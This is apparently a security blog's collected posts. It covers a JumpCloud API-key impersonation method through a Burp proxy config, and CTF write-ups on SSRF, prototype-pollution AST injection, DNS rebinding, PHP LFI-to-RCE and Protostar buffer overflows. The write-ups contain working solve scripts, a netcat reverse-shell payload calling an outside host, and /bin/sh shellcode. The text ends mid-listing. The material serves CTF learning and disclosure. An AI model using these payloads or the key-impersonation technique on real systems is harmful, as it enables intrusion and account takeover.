JumpCloud is a Directory as a Service provider providing cloud native Directory service for cloud native companies. In a Red Team engagement or Pentest scenario, one may come across a API token which could have Administrative Privileges. Instead of going through the pain of reading Jumpcloud Documentation, why not use Jumpcloud console natively too! (If you want to see my repo directly, here it is: https://github.com/ahboon/JumpCloud-Proxy)

To view what permissions your current API key has, you can use this curl sample:

curl -i -s -k -X $'GET' \
    -H $'Host: console.jumpcloud.com' -H $'X-Api-Key: <apiKey>' -H $'Content-Length: 2' \
    --data-binary $'\x0d\x0a' \
    $'https://console.jumpcloud.com/api/users/getSelf'

Full list of Admin User Types in Jumpcloud enabled with API key can be seen here: https://support.jumpcloud.com/s/article/JumpCloud-Roles

Next, download the Burp Project Configuration from here: https://raw.githubusercontent.com/ahboon/JumpCloud-Proxy/main/Jumpcloud-Proxy.json

Then follow the steps below:

1. Register an account for jumpcloud at: https://console.jumpcloud.com/signup (skip this step if you already have)
2. Open burp and load the Jumpcloud-Proxy.json Project Configuration file
3. Under "Proxy" > "Proxy Settings" > "Match and replace rules", uncheck all boxes to stop match and replace
4. Click on "Open Browser" using Burp's Proxy Browser, and login to your own Jumpcloud account at https://console.jumpcloud.com/login/admin
5. Once logged in, go back to Burp. Under "Proxy" > "Proxy Settings" > "Match and replace rules", and check all boxes to enable the match and replace. At the same time, click on the line that says "x-api-key: <Jumpcloud api key>", and replace the "<Jumpcloud api key>" with your desired Jumpcloud API key
6. Start using Jumpcloud as though you are the user of the API key!

UPDATE: This writeup was hidden since 2019 due to the solution used. It was only recently where I released a CTF challenge using the same solution. Since it was solved, I decided that this writeup should resurface.

Given the source file:

#! /usr/bin/env python 
#encoding=utf-8 
from flask import Flask 
from flask import request 
import socket 
import hashlib 
import urllib 
import sys 
import os 
import json 

reload(sys) 
sys.setdefaultencoding('latin1') 
app = Flask(__name__) 
secert_key = os.urandom(16) 

class Task: 
	def __init__(self, action, param, sign, ip): 
		self.action = action 
		self.param = param 
		self.sign = sign 
		self.sandbox = md5(ip) 
		if(not os.path.exists(self.sandbox)): 
		#SandBox For Remote_Addr 
			os.mkdir(self.sandbox) 
	def Exec(self): 
		result = {} 
		result['code'] = 500 
			if (self.checkSign()): 
				if "scan" in self.action: 
					tmpfile = open("./%s/result.txt" % self.sandbox, 'w') 
					resp = scan(self.param) 
				if (resp == "Connection Timeout"): 
					result['data'] = resp 
				else: 
					print resp 
					tmpfile.write(resp) 
					tmpfile.close() 
					result['code'] = 200 
				if "read" in self.action: 
						f = open("./%s/result.txt" % self.sandbox, 'r') 
						result['code'] = 200 
						result['data'] = f.read() 
					if result['code'] == 500: 
						result['data'] = "Action Error"
				else: 
					result['code'] = 500 
					result['msg'] = "Sign Error" 
					return result 
	def checkSign(self): 
		if (getSign(self.action, self.param) == self.sign): 
			return True 
		else: 
			return False #generate Sign For Action Scan. 

@app.route("/geneSign", methods=['GET', 'POST']) 
def geneSign(): 
	param = urllib.unquote(request.args.get("param", "")) 
	action = "scan" 
	return getSign(action, param) 

@app.route('/De1ta',methods=['GET','POST']) 
def challenge(): 
	action = urllib.unquote(request.cookies.get("action")) 
	param = urllib.unquote(request.args.get("param", "")) 
	sign = urllib.unquote(request.cookies.get("sign")) 
	ip = request.remote_addr 
	if(waf(param)): 
		return "No Hacker!!!!" 
	task = Task(action, param, sign, ip) 
	return json.dumps(task.Exec()) 

@app.route('/') 
def index(): 
	return open("code.txt","r").read() 

def scan(param): 
	socket.setdefaulttimeout(1) 
	try: 
		return urllib.urlopen(param).read()[:50] 
	except: 
		return "Connection Timeout" 

def getSign(action, param): 
	return hashlib.md5(secert_key + param + action).hexdigest() 

def md5(content): 
	return hashlib.md5(content).hexdigest() 

def waf(param): 
	check=param.strip().lower() 
	if check.startswith("gopher") or check.startswith("file"): 
		return True 
	else: 
		return False 

if __name__ == '__main__': 
	app.debug = False app.run(host='0.0.0.0',port=80)

To cut things short on how this "application" works, you will first provide a URL to /getSign to get contents of that URL, and using that signature, use it at the /De1ta to read the contents. Easy right? But there are some hurdles to overcome.

We will need to find a way to bypass the checks for read file signature and also the waf() function.

Our goal is to leak the ./flag.txt file. There are many ways to do this, while I did it the "longer" way, there is a shorter way to leak it once the waf() function is bypassed.

At the /geneSign route, we see that it takes in a URL with GET variables and processes it at the getSign() function. This will generate a signature, it will be validated when using the /De1ta route.

However, we only can generate actions which are scan. We will not be able to generate a read action. But examining the Exec() function closely, it is apparent that the if/else statements checks if the keywords are IN the URL given.

So given the following URL:
http://139.180.128.86/geneSign?param=http://google.comreadand

The signature will be constructed as such by getSign():
return hashlib.md5(secert_key + param + action).hexdigest().
SECRET_KEY + "http://google.comreadand" + "scan" = "SECRET_KEYhttp://google.comreadandscan"
So the signature will be generated with inputs we control which can be used at /De1ta to trigger actions of both read and scan.

This will then give us a valid signature, and it can be used to trigger read and scan because in the subsequent action, the action payload sent will contain both read and scan keywords which will trigger the if else statements!

Next, we have to bypass the if check.startswith("gopher") or check.startswith("file"): check. Well, it is pretty simple. Just use flag.txt and thats it! But... I kind of overthink? I went on to look at how urllib actually parses URLs...

In urllib, there is a function called unwrap which is called by the urllib parser. https://kite.com/python/docs/urllib.unwrap

Essentially, <URL:scheme://host/path> will be converted into scheme://host/path. With this, we can bypass the "starts with" mechanism used by the waf() function. (Note: This works with urllib2 as well)

And here is the solve script!

import requests

payload = "<URL:file:///proc/self/cwd/flag.txt>readand"
payload_two = "<URL:file:///proc/self/cwd/flag.txt>"
a = requests.get("http://139.180.128.86/geneSign?param="+payload)
print a.text

cookies = {'action': 'readandscan',
			'sign':a.text}
r = requests.post('http://139.180.128.86/De1ta?param='+payload_two, cookies=cookies)

print r.text

45c6325c3166748e875137554ad72d6e
{"code": 200, "data": "de1ctf{27782fcffbb7d00309a93bc49b74ca26}"}

Credits to https://lord.idiot.sg/ for the late night discussion on the challenge! Check out his site for awesome write ups too!

Gunship

This challenge is an AST injection challenge.

const path              = require('path');
const express           = require('express');
const handlebars        = require('handlebars');
const { unflatten }     = require('flat');
const router            = express.Router();

router.get('/', (req, res) => {
    return res.sendFile(path.resolve('views/index.html'));
});

router.post('/api/submit', (req, res) => {
	// unflatten seems outdated and a bit vulnerable to prototype pollution
	// we sure hope so that po6ix doesn't pwn our puny app with his AST injection on template engines

    const { artist } = unflatten(req.body);

	if (artist.name.includes('Haigh') || artist.name.includes('Westaway') || artist.name.includes('Gingell')) {
		return res.json({
			'response': handlebars.compile('Hello {{ user }}, thank you for letting us know!')({ user:'guest' })
		});
	} else {
		return res.json({
			'response': 'Please provide us with the full name of an existing member.'
		});
	}
});

module.exports = router;

A clue was given in the challenge referencing po6ix, and it led me to his write up: https://blog.p6.is/AST-Injection/

To sum it up, one must trigger the unflatten function then trigger the handlebars.compile function to trigger the template injection.

This therefore allows remote code execution by injecting typical templating attack payloads. (Thanks alot po6ix for the example).

Hence, to trigger the vulnerability for this challenge, I first have to send a request containing the payload to trigger unflatten, then make another valid request to trigger the handlebars.compile.

import requests

TARGET_URL = 'http://docker.hackthebox.eu:30720'

# make pollution
a = requests.post(TARGET_URL + '/api/submit', json = {
    "__proto__.type": "Program",
    "__proto__.body": [{
        "type": "MustacheStatement",
        "path": 0,
        "params": [{
            "type": "NumberLiteral",
            "value": "process.mainModule.require('child_process').execSync(`nc MY_IP_ADDRESS 3333 -e /bin/sh`)"
        }],
        "loc": {
            "start": 0,
            "end": 0
        }
    }]
})
print(a.text)
# execute
a = requests.post(TARGET_URL + '/api/submit', json = {
    "artist.name":"Haigh"
})
print(a.text)

Cached Web

This challenge is a DNS rebinding SSRF challenge.
To summarize the behavior of the web app, the web app takes in a URL given by the user, and it checks if the supplied URL is a local address or it is a hostname that points to local address. If it is not an illegal hostname or IP address, it uses selenium to capture a screen shot of the webpage belonging to the supplied URL. Looking at the source code, we can see that there is no way of using url/scheme manipulation to achieve SSRF. A hint given by the challenge is rebinding. (DNS Rebinding is the first thing that came to my mind).

Source

import functools, signal, os, re, socket
from urllib.parse import urlparse
from application.models import cache
from flask import request, abort
from struct import unpack

generate = lambda x: os.urandom(x).hex()

def flash(message, level, **kwargs):
    return { 'message':message, 'level':level, **kwargs }

def serve_screenshot_from(url, domain, width=1000, min_height=400, wait_time=10):
    from selenium import webdriver
    from selenium.webdriver.support.ui import WebDriverWait
    from selenium.webdriver.chrome.options import Options

    options = Options()

    options.add_argument('--headless')
    options.add_argument('--no-sandbox')
    options.add_argument('--ignore-certificate-errors')
    options.add_argument('--disable-dev-shm-usage')
    options.add_argument('--disable-infobars')
    options.add_argument('--disable-background-networking')
    options.add_argument('--disable-default-apps')
    options.add_argument('--disable-extensions')
    options.add_argument('--disable-gpu')
    options.add_argument('--disable-sync')
    options.add_argument('--disable-translate')
    options.add_argument('--hide-scrollbars')
    options.add_argument('--metrics-recording-only')
    options.add_argument('--no-first-run')
    options.add_argument('--safebrowsing-disable-auto-update')
    options.add_argument('--media-cache-size=1')
    options.add_argument('--disk-cache-size=1')
    options.add_argument('--user-agent=SynackCTF/1.0')

    driver = webdriver.Chrome(
        executable_path='chromedriver', 
        chrome_options=options,
        service_log_path='/tmp/chromedriver.log', 
        service_args=['--cookies-file=/tmp/cookies.txt', '--ignore-ssl-errors=true', '--ssl-protocol=any' ]
    )

    driver.set_page_load_timeout(wait_time)
    driver.implicitly_wait(wait_time)

    driver.set_window_position(0, 0)
    driver.set_window_size(width, min_height)

    driver.get(url)

    WebDriverWait(driver, wait_time).until(lambda r: r.execute_script('return document.readyState') == 'complete')

    filename = f'{generate(14)}.png'

    driver.save_screenshot(f'application/static/screenshots/{filename}')

    driver.service.process.send_signal(signal.SIGTERM)
    driver.quit()

    cache.new(domain, filename)

    return flash(f'Successfully cached {domain}', 'success', domain=domain, filename=filename)

def cache_web(url):
    print(url)
    scheme = urlparse(url).scheme
    print(scheme)
    domain = urlparse(url).hostname
    print(domain)

    if scheme not in ['http', 'https']:
        return flash('Invalid scheme', 'danger')

    def ip2long(ip_addr):
        return unpack("!L", socket.inet_aton(ip_addr))[0]
    
    def is_inner_ipaddress(ip):
        print(ip)
        ip = ip2long(ip)
        print(ip)
        return ip2long('127.0.0.0') >> 24 == ip >> 24 or \
                ip2long('10.0.0.0') >> 24 == ip >> 24 or \
                ip2long('172.16.0.0') >> 20 == ip >> 20 or \
                ip2long('192.168.0.0') >> 16 == ip >> 16 or \
                ip2long('0.0.0.0') >> 24 == ip >> 24
    
    try:
        if is_inner_ipaddress(socket.gethostbyname(domain)):
            return flash('IP not allowed', 'danger')
        return serve_screenshot_from(url, domain)
    except Exception as e:
        return flash('Invalid domain', 'danger')

def is_from_localhost(func):
    @functools.wraps(func)
    def check_ip(*args, **kwargs):
        if request.remote_addr != '127.0.0.1':
            return abort(403)
        return func(*args, **kwargs)
    return check_ip

Some research was needed to understand DNS rebinding as it was my first time. TL;DR, DNS rebinding requires an attacker controlled domain to change the A record at the shortest time possible between two requests made. First request to bypass the check, second request to achieve SSRF. Detailed information here: https://danielmiessler.com/blog/dns-rebinding-explained/

I needed a quick an easy way to configure ABC.controlled.domain. For the first request it makes to my controlled domain, it will provide a valid public IP address. For the subsequent request which has passed the blacklist check, my controlled domain will then provide 127.0.0.1 instead of a public address. Hence, rebinding the IP address to the domain name.

I found a great tool at: http://rbnd.gl0.eu/dashboard

This allows quick and easy setup with a unique URL provided.

Example (Creating record):

Example (Seeing the request made):

PHP can be interesting. I recently came across an interesting web CTF challenge. It is unfortunate that I am not able to show the beautiful screen shots of the challenge. What I have are screen shots of the locally hosted version which does not have the CSS and images.

The path of exploitation is as such: LFI -> Account Takeover -> Unrestricted File Upload -> Full path disclosure through file download -> LFI RCE.

We can identify it as a PHP webpage by looking at the application cookies where it uses PHP sessions.

First, we are presented with a page with a trivial Local File Inclusion (LFI) vector. http://target/?page=login. When a URL comes with page=login, the source code might look something like include $_GET['url']."php";. We can achieve LFI by using PHP wrappers which can encode files into base64 and output it as text by doing php://filter/convert.base64-encode/resource=login. By doing so, we get the source of login.php.

We therefore can leak index as well by doing php://filter/convert.base64-encode/resource=index. The source code confirms that the page variable is the vector for LFI.

<?php

if(isset($_GET['page']) && !empty($_GET['page']))
{
	include($_GET['page'] . ".php");
}
else
{
	header("Location: ?page=home");
}

?>

With the PHP wrapper, we are able to download source codes of the application. A forget password page exists, and examining the source code shows interesting code blocks.

<?php
if(isset($_POST["ticket"]) && !empty($_POST["ticket"]))
{
		if($_SESSION["form_token"]===$_POST["token"]) {
			unset($_SESSION['form_token']);
			$_SESSION["form_token"] = md5(uniqid(rand(), true));
			$ticket = unserialize(base64_decode($_POST["ticket"]));
			$username = $ticket->name;
			$secret_number = $ticket->secret_number;
			$count = check_user_exists($conn, $username);
			if($count === 1)
			{	
				if(check_length($secret_number, 9)) {
					$secret_number = strtoupper($secret_number);
					$secret_number = check_string($secret_number);
					$secret = get_secret($conn,$username);
					if($secret_number !== $secret) {
						print("Wrong secret!");
					}
					else
					{
					print("OK, we will send you the new password");}
					$random_rand = rand(0,$secret_number);
					srand($random_rand);
					$new_password = "";
					while(strlen($new_password) < 30) {
						$new_password .= strval(rand());
					}
					reset_password($conn, $username, $new_password);
				}
				else
				{
					print("<center>IMPOSTOR ALERT!!!!</center>");
				}
			}
			else
			{
				print("<center>IMPOSTOR ALERT!!!!</center>");
			}
		}
		else
		{
			print("<center>IMPOSTOR ALERT!!!!</center>");
		}
}

?>

We can see that it reads a POST variable called ticket, which is base64 decoded and unserialized $ticket = unserialize(base64_decode($_POST["ticket"]));. Looking at lib.php, we can find the corresponding class that it uses to create the $ticket object.

class CrewMate {
	public $name;
	public $secret_number;
}

The attention is now brought to lib.php, since most of the functions used exists in this file. check_user_exists() checks if user supplied in the serialized data exists in the database, then if it passes, it goes into another code block which checks if the length of secret value given was 9.

function check_length($input, $length) {
	return strlen($input)==$length || count($input)==$length || sizeof($input)==$length;
}

It then converts the input to upper, and it sanitized it using check_string() where a byte of \x00 is replaced by a random character. This seems to be a mitigation to prevent NULL bytes. (Clue here I guess?)

We then see that it checks if the given secret is the same as the database secret. Else, it prints.

What is sneaky about the author is that they hid a curly brace bracket at the end of the print() line. Which is also why it took me some time to solve this challenge as I did not spot the crucial hidden curly brace.

if(check_length($secret_number, 9)) {
					$secret_number = strtoupper($secret_number);
					$secret_number = check_string($secret_number);
					$secret = get_secret($conn,$username);
					if($secret_number !== $secret) {
						print("Wrong secret!");
					}
					else
					{
					print("OK, we will send you the new password");}
					$random_rand = rand(0,$secret_number);
					srand($random_rand);
					$new_password = "";
					while(strlen($new_password) < 30) {
						$new_password .= strval(rand());
					}
					reset_password($conn, $username, $new_password);
				}

This means that, as long our secret is a length of 9, failing the check does not matter as it will still execute the statements after it. Therefore, based on the secret number supplied, the new password is determined by the value of the secret number, and the new password is generated under the influence of random values.

This calls for the analysis of how can one control the password reset. Since it is possible to send a serialized data, we can send raw bytes like \x01\x01\x01\x01\x01\x01\x01\x01\x01. Further inspection of the check_string() function suggests that the function replaced null bytes with a random variable, and it returns the first 5 bytes of the input, and converts it to to an integer to be returned.

function check_string($input) {
	if(is_string($input)) {
		$input = str_replace(chr(0), chr(rand(33,126)), $input);
		return hexdec(substr(bin2hex($input),0,10));
	}
	return $input;
}

Just sending \x01 * 9 would be perfect right?
No.... \x01 * 5 (Since it only takes first 5 bytes at the substr() function) in decimal is 16843009. Therefore, the range could be very very large and unpredictable.

However, since we are able to control the ticket sent in, there are more than one type of data we can send as the original class is not type strict, and it is not checked in any parts of the source code as well.

Testing the code snippet, we can observe that if the rand() function was given a NULL value, the random output would be predictable and the same at each run time.

$random_rand = rand(0,NULL);
..
..
..
// Run 1
// string(10) "1178568022"
// string(20) "11785680221273124119"
// string(30) "117856802212731241191535857466"
// string(30) "117856802212731241191535857466"

// Run 2
// string(10) "1178568022"
// string(20) "11785680221273124119"
// string(30) "117856802212731241191535857466"
// string(30) "117856802212731241191535857466"

So we need a way to bypass the character swap for \x00 in the check_string() function. To bypass the mitigation, we need to make sure it passes the test for the length of the secret number input.

We can instead, pass in an array of size 9 in the serialized object. array(0,0,0,0,0,0,0,0,0); Passing that value into rand(), the Array is treated as a NULL value, and it produces the same output as that of the previous experiment.

$random_rand = rand(0,array(0,0,0,0,0,0,0,0,0));
..
..
// Warning: rand() expects parameter 2 to be int, array given in REDACTED on line 47
// string(10) "1178568022"
// string(20) "11785680221273124119"
// string(30) "117856802212731241191535857466"
// string(30) "117856802212731241191535857466"

We can therefore affirm that the password generated will not be random, and it will always be 117856802212731241191535857466. We can now login as any users available listed in crews.php.

Now we are authenticated, we can then access the electrocal.php. We can see that it supports a file upload feature.

<!-- upload -->
<br><br>
<div class="w3-container">
  <div class="w3-black">
    <div id="myBar" class="w3-green" style="height:24px;width:0"></div>
  </div>
  <br>
</div>
<center>
<form id="myform" method="post" action="?page=electrical" enctype="multipart/form-data">
 	<input type="file" name='file'><br>
</form>
<br><input type="submit" name="upload_file" onclick="move()" value="Upload">
</center>
<?php
upload($_FILES["file"]);
?>


<!-- download -->
<br><br>
<div class="w3-container">
  <div class="w3-black">
    <div id="myBar2" class="w3-green" style="height:24px;width:0"></div>
  </div>
  <br>
</div>
<center>
<?php 
download();
?>
</center>

function upload($file) {
	if(isset($file))
	{
		if($file["size"] > 1485760) {
			die('<center>IMPOSTOR ALERT!!!</center>');
		}	
		$uploadfile=$file["tmp_name"];
		$folder="crew_upload/";
		$file_name=$file["name"];
		$new = $file["tmp_name"].$file_name;
		move_uploaded_file($file["tmp_name"], $new);
		$zip = new ZipArchive(); 
		$zip_name ="crew_upload/".md5(uniqid(rand(), true)).".zip";
		if($zip->open($zip_name, ZIPARCHIVE::CREATE)!==TRUE)
		{ 
		 	echo "Sorry ZIP creation failed at this time";
		}
		$zip->addFile($new);
		$zip->close();
		if(isset($_SESSION["link"]) && !empty($_SESSION["link"])) {
			unlink($_SESSION["link"]);
			unset($_SESSION["link"]);
		}
		$_SESSION["link"] = $zip_name;
		header("Refresh: 0");
	}
}

function download() {
if(isset($_SESSION["link"]) && !empty($_SESSION["link"])) {

	print('<a href="'.$_SESSION["link"].'" download>
  		<button id="test" hidden>a</button>
	</a>');
	print('<input type="submit" name="download_file" onclick="move2()" value="Download">');
	}
}

There seems to be no restriction on what file we can upload. Furthermore, upon trying the function, we are able to download the uploaded file, and it will be given to us as a ZIP file. Another feature that can be noted is that the transient file uploaded is not deleted. Therefore, we can achieve LFI RCE if we know the full path of the transient file.

Unzipping the downloaded file, we can see that the full path is disclosed. Therefore, uploading a PHP shell will do the trick.

Uploaded payload:

<?php

echo phpinfo();

?>

Full path revealed once unzipped. Take note that I am hosting the files locally and therefore what is shown is not the full path of the actual challenge. /redacted_initial_path/tmp/php/php0kziNuevil.php

We can trigger the exploit by visiting http://localhost:8888/?page=/redacted_initial_path/tmp/php/php0kziNuevil. Note that the .php was omitted because .php will be appended by the system.

Execution of PHP code achieved. :)

Thereafter it is just a little tweaking of codes to obtain remote code execution and solve!

Inspired by my previous adventures and my recent Go encounters, here is my attempt to start something. A git directory finder on web roots written in go. Still a work in progress... https://github.com/ahboon/GoFindGit

I NEED TO LEARN SOMETHING NEW!!!!!

And yes, I started to learn some C and assembly.. Which ultimately lead to the learning of software security. This started my interest to explore bufferoverflow, format string attacks and the list goes on..

If you are not familiar with the stack, watch this first:
https://www.youtube.com/watch?v=FNZ5o9S9prU

And this to understand a little more on Bufferoverflow:
https://payatu.com/understanding-stack-based-buffer-overflow/

Protostar is a beginner friendly exploitation VM. Source here: https://github.com/hellosputnik/exploit-exercises/tree/master/Protostar

Time to share some of my learning experiences here.
The actual site is down. Here is a wayback machine to view the snapshots: https://web.archive.org/web/20140405135419/http://exploit-exercises.com/protostar/stack0

Stack 0:

1#include <stdlib.h>
2#include <unistd.h>
3#include <stdio.h>
4
5int main(int argc, char **argv)
6{
7  volatile int modified;
8  char buffer[64];
9
10  modified = 0;
11  gets(buffer);
12
13  if(modified != 0) {
14    printf("you have changed the 'modified' variable\n");
15  } else {
16    printf("Try again?\n");
17  }
18}

This is a simple buffer overflow challenge, where our goal is to modify the variable modified. There is not indication of what should it be modified to, therefore as long we overflow it, it will get to the logic we want running, which is having it to pring "you have changed the 'modified' vaariable'.

First of all, a variabled called buffer was initialized with a size of 64. However, at the gets() function, it does not check for input size given by the user. Thus, this is the vulnerability. How it causes the 'bufferoverflow' is that when the input is read from the user, a "long enough" input will overwrite the value at modified.

Stack 1:

 1#include <stdlib.h>
 2#include <unistd.h>
 3#include <stdio.h>
 4#include <string.h>
 5
 6int main(int argc, char **argv)
 7{
 8  volatile int modified;
 9  char buffer[64];
10
11  if(argc == 1) {
12    errx(1, "please specify an argument\n");
13  }
14
15  modified = 0;
16  strcpy(buffer, argv[1]);
17
18  if(modified == 0x61626364) {
19    printf("you have correctly got the variable to the right value\n");
20  } else {
21    printf("Try again, you got 0x%08x\n", modified);
22  }
23}

Similar to Stak0, now we have to overwrite modified with 0x61626364. However, we will be shown with the values written in memory!
Using the following payload: ./stack1 `python -c 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x41"'`.

We can clearly see that \x41 is written into the memory of modified variable. We will then insert 0x61626364 in little endian format.

Using the following payload: ./stack1 `python -c 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x64\x63\x62\x61"'`.

The value will then be correctly written into modified!

Stack 2:
Similar to Stack 1, we are going to store our payload in the environment variable this time.

 1#include <stdlib.h>
 2#include <unistd.h>
 3#include <stdio.h>
 4#include <string.h>
 5
 6int main(int argc, char **argv)
 7{
 8  volatile int modified;
 9  char buffer[64];
10  char *variable;
11
12  variable = getenv("GREENIE");
13
14  if(variable == NULL) {
15    errx(1, "please set the GREENIE environment variable\n");
16  }
17
18  modified = 0;
19
20  strcpy(buffer, variable);
21
22  if(modified == 0x0d0a0d0a) {
23    printf("you have correctly modified the variable\n");
24  } else {
25    printf("Try again, you got 0x%08x\n", modified);
26  }
27
28}

Using the command export GREENIE=$(python -c 'print "A"*100') we will be able to store our payload in the environment. Make sure this is done first before going to the next step.

Next, we need to debug using GDB.
To confirm that we have our, we need to first load the binary into GDB by doing gdb stack2. Next, we will set a break point at the main() function by doing break *main. This will set a breakpoint at main(), and we will be able to view the values loaded in memory.

Before running the above, I have changed my payload to export GREENIE=$(python -c 'print "A"*64 + "BBBB"')

Type run and the program will pause at the point where it loads main().

Type x/1000s $esp to examine the stack.
Presing enter a few times will bring you to the location where the environment variables are stored.

Quit the output by pressing q + enter.
Now to continue the program, type in c and press Enter.

Notice that similar to stack1, we have written 42424242 onto the variable and it prints out the variable as intended?

To achieve the goal of this challenge, we will need to ensure the variable modified is written with 0x61626364. Following the payload for stack1, we can write the needed value into the environment variable. Quit GDB by typing quit and enter. Use export GREENIE=$(python -c 'print "A"*64+"\x0a\x0d\x0a\x0d"') to change the envrionmetn variable, and then run the program normally this time as we no longer need GDB. :)

Stack 3:
A built up from the previous challanges, stack 3 requires us to change the code execution flow.

 1#include <stdlib.h>
 2#include <unistd.h>
 3#include <stdio.h>
 4#include <string.h>
 5
 6void win()
 7{
 8  printf("code flow successfully changed\n");
 9}
10
11int main(int argc, char **argv)
12{
13  volatile int (*fp)();
14  char buffer[64];
15
16  fp = 0;
17
18  gets(buffer);
19
20  if(fp) {
21    printf("calling function pointer, jumping to 0x%08x\n", fp);
22    fp();
23  }
24}

The method of exploitation is the same. However, instead of writing values, we will overwrite it with an address. This is because when we do a bufferoverflow on the stack, it wants to jump back to a certain address. This can be shown in the following screen shots.

First we need to generate a text file in /tmp named payload.txt. This will be the text file which GDB will read from when we want to supply a standard input.
python -c 'print "A"*64+"BBBB"' > /tmp/payload.txt
Then run gdb stack3, and type run < /tmp/payload.txt.

Realize that it is "jumping to 0x42424242"?
This in fact is the behavior of the program.
Now lets find out the address for win().
Using objdump -t stack3 | grep win, we will be able to identify the address where win() is stored.

user@protostar/bin$ objdump -t stack3 | grep win
08048424 g     F .text	00000014              win
user@protostar:/opt/protostar/bin$ 

As shown, the location of win() is at 0x08048424.
All we have to do now is to repace the BBBB in our payload with the memory address of win() in little endian format!

The following command will instantly give us the WIN. python -c 'print "A"*64+"\x24\x84\x04\x08"' | ./stack3

Stack 4:
Similar to stack3, we need to change the code execution to execute the win() function instead.

 1#include <stdlib.h>
 2#include <unistd.h>
 3#include <stdio.h>
 4#include <string.h>
 5
 6void win()
 7{
 8  printf("code flow successfully changed\n");
 9}
10
11int main(int argc, char **argv)
12{
13  char buffer[64];
14
15  gets(buffer);
16}

The vulnerable logic is still the gets(buffer); code at line 15. So we just have to over flow this! Similar to previous stack binary, the limit should an input of size 76 before it overflows into EBP. This can be checked with the following link as well: https://github.com/Svenito/exploit-pattern.

The next task is to find out the address of win(), and to do that, we can use objdump -t stack4 | grep win.

Once we got the address, all that is left is to make the exploit work! python -c "print 'A'*76 + '\xf4\x83\x04\x08'" | ./stack4

Stack 5:
Where the real shell popping starts. Hehe.

 1#include <stdlib.h>
 2#include <unistd.h>
 3#include <stdio.h>
 4#include <string.h>
 5
 6int main(int argc, char **argv)
 7{
 8  char buffer[64];
 9
10  gets(buffer);
11}

Over here, we only see that the program would take an input and directly stores it to buffer. Since there is not "win" function to achieve, this means that its time to pop some shells! At first when I approach this...

First lets open this program with GDB and then cause a seg-fault by throwing in an input of length more than 76. python -c 'print "A"*76+"BBBB"' > /tmp/input

Now lets find a usable jmp esp instruction loaded in this binary.
First we use info proc map to see where was being loaded for this process.

Putting my attention to 0xb7e97000 0xb7fd5000 0x13e000 0 /lib/libc-2.11.2.so, I decided to give a try on this to look for possible jmp esp instructions within this range.

Using the command find /b 0xb7e97000,0xb7fd5000,0xff,0xe4, I then able to list possible addresses with jmp esp.

So here is the plan. The payload will be as such: [padding] + [jmp esp] + [shellcode]. The idea is that wherever the thing is jumping to, it will return back to the shellcode and load the shellcode!

Final exploit code:

python -c 'print "A"*76+"\x1d\x9a\xe9\xb7"+"\x90"*16+"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"' > /tmp/input.txt

Executing it....

Work in progres...
Left with Stack 6 and 7.

Credits to this guy for an awesome writeup as well which also helped my learning: https://www.ayrx.me/protostar-walkthrough-stack

I have recently disclosed a couple of websites with issues relating to exposed .env and exposed .git web resources. Theses websites belongs to reputable local companies. To make matters worse, one of it has its entire envrionment credentials stored in the .env file and potentially allowing an attacker to take over the database and AWS environment. That's right, AWS environment.

Yes the blog title is literally "Seriously?".

To my readers, if you can type in https://<your_domain>/.git/HEAD or https://<your_domain/.env and receive a reply that looks like a text file, your number one priority is to fix it.

In a typical capture the flag compeition, finding this issue and successfully "exploiting" it is a point for the participant. But in a real world public internet scenario, it could be the next data breach news headline.

Some personal insights...
A typical exposed .env usually belongs to a PHP framework, like Laravel. It was only for this instance, I encountered a Wordpress app which has an exposed .env file. (Even though Wordpress is also using PHP)

Here are some resources to help you fix such issues:
[Apache] https://serverfault.com/questions/128069/how-do-i-prevent-apache-from-serving-the-git-directory
[Nginx] https://gist.github.com/jaxbot/5748513

Note: Links above shows how one can reconfigure their web server to prevent the serving of .git resources. The same can be done for .env paths. Alternatively, WAFs or Cloudflare can be used.

Finally...
Stay safe, and be responsible for your own data. Cheers!

Inspection

Head over to the link below to find the flag.
https://expect-glugctf.netlify.com/

This is a typical HTML source code view flag. Viewing source will give you the flag. <div><!--The flag is GLUG{3el(0me_1o_$h3_N3xT_7eve7}--></div>

Go Get It!

Head over to the link below to find the flag.
http://104.248.49.223:7070/

Source code:
<!DOCTYPE html>
<html>
<head>
    <title>Flag!Flag!Flag!</title>
    <link rel="stylesheet" href="css/main.css">
</head>
<body>
    <div class='contain-flag'>
      <div class='pole'></div>
      <div class='flag'></div>
      <div class='shadow'></div>
      <div class='flag flag-2'></div>
    </div>
    <div>
        <center>
        <h3>This is just a decoy of the FLAG!</h3>
        <small>If you ask nicely, maybe i will give it to you.</small>
        <small>View Source of this page <a href="https://pastebin.com/LvfdATxz" target="_blank">Here</a></small>
        </center>
    </div>
    <pre><?php
    $flag = #REDACTED
 
    if(array_key_exists("flag", $_GET)) {
        if($_GET["flag"] === "true"){
        echo $flag;
        }
    }
    ?>
    </pre>
</body>
</html>

This is a challenge which expects a GET request with the variable 'flag', and its value equals to 'true'. Therefore, the solve for this is http://104.248.49.223:7070/?flag=true. GLUG{4lw4y5_fuzz_f0r_h1dd3n_p4r4m373r5}

Rotten

Head over to the link below to find the flag.
https://rotplayer-glugctf.netlify.com/

Source Code:

<!DOCTYPE Html />
<html>
 <head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
 <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
 <style type="text/css">
 .ins {
  padding:auto;
  margin:5rem auto 0 auto;
  text-align:center;
 }
 .btn {
  padding:auto;
  margin:1rem;
 }
 </style>
 <title>Rot Player</title>
 </head>
 <body>
<div class="container text-center">
 <h2>Rot Player</h2><small>Entry Point</small>
 <div class="container ins">
	 <input type="text" name="flag" id="flag" placeholder="Enter the flag" /><br>
	 <button class="btn btn-primary" id="check" >Login with Flag!</button>
 </div>
</div>

 <script type="text/javascript">
 document.getElementById("check").onclick = function () {
 var flag = document.getElementById("flag").value;
